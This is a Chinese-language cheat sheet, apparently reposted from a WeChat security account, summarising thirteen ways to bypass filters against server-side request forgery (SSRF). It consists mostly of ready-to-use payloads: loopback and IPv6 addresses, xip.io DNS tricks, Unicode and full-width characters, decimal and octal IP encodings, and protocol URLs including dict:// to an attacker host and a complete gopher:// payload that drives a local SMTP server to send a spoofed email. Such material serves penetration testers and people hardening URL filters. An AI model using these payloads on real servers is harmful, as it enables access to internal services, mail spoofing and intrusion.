1、攻击本地
1 2
|
http://127.0.0.1:80 http://localhost:22
|
2、利用[::]
1 2 3
|
利用[::]绕过localhost http://[::]:80/ >>> http://127.0.0.1 也有看到利用http://0000::1:80/的,但是我测试未成功
|
3、利用@
1
|
http://example.com@127.0.0.1
|
4、利用短地址
1
|
http://dwz.cn/11SMa >>> http://127.0.0.1
|
5、利用特殊域名
利用的原理是DNS解析
1
|
http://127.0.0.1.xip.io/
|
1
|
http://www.owasp.org.127.0.0.1.xip.io/
|
6、利用DNS解析
7、利用上传
1 2 3 4
|
也不一定是上传,我也说不清,自己体会 -.- 修改"type=file"为"type=url" 比如: 上传图片处修改上传,将图片文件修改为URL,即可能触发SSRF
|
8、利用Enclosed alphanumerics
1 2 3 4
|
利用Enclosed alphanumerics ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ >>> example.com List: ① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳ ⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾ ⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇ ⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗ ⒘ ⒙ ⒚ ⒛ ⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰ ⒱ ⒲ ⒳ ⒴ ⒵ Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ ⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿
|
9、利用句号
1
|
127。0。0。1 >>> 127.0.0.1
|
10、利用进制转换
1 2 3 4 5
|
可以是十六进制,八进制等。 115.239.210.26 >>> 16373751032 首先把这四段数字给分别转成16进制,结果:73 ef d2 1a 然后把 73efd21a 这十六进制一起转换成8进制 记得访问的时候加0表示使用八进制(可以是一个0也可以是多个0 跟XSS中多加几个0来绕过过滤一样),十六进制加0x
|
1
|
http://127.0.0.1 >>> http://0177.0.0.1/
|
1
|
http://127.0.0.1 >>> http://2130706433/
|
1 2
|
http://192.168.0.1 >>> http://3232235521/ http://192.168.1.1 >>> http://3232235777/
|
11、利用特殊地址
12、利用协议
1 2 3 4 5 6 7 8 9 10 11
|
Dict:// dict://<user-auth>@<host>:<port>/d:<word> ssrf.php?url=dict://attacker:11111/ SFTP:// ssrf.php?url=sftp://example.com:11111/ TFTP:// ssrf.php?url=tftp://example.com:12346/TESTUDPPACKET LDAP:// ssrf.php?url=ldap://localhost:11211/%0astats%0aquit Gopher:// ssrf.php?url=gopher://127.0.0.1:25/xHELO%20localhost%250d%250aMAIL%20FROM%3A%3Chacker@site.com%3E%250d%250aRCPT%20TO%3A%3Cvictim@site.com%3E%250d%250aDATA%250d%250aFrom%3A%20%5BHacker%5D%20%3Chacker@site.com%3E%250d%250aTo%3A%20%3Cvictime@site.com%3E%250d%250aDate%3A%20Tue%2C%2015%20Sep%202017%2017%3A20%3A26%20-0400%250d%250aSubject%3A%20AH%20AH%20AH%250d%250a%250d%250aYou%20didn%27t%20say%20the%20magic%20word%20%21%250d%250a%250d%250a%250d%250a.%250d%250aQUIT%250d%250a
|
13、使用组合
各种绕过的组合即可
作者:瓦都剋,来源:http://byd.dropsec.xyz/
快戳阅读原文!获取更多视频教程
本文始发于微信公众号(乌雲安全):SSRF绕过方法总结
评论